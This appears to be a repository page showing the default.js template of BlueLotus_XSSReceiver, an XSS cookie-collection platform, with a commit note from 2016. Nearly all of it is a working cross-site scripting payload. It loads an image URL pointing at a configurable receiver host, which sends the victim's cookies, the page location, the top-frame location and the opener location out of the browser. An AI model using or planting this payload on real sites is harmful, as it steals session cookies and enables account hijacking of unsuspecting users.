Files
BlueLotus_XSSReceiver/template/default.js
firesun 3cb52ed6e2 Version 3.3.6
将自带js模板的文件名全部更名为中文,兼容windows平台,服务器为windows平台用户请勿使用中文作为文件名
2016-02-01 21:23:52 +08:00

2 lines
492 B
JavaScript

var website="http://网站地址";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();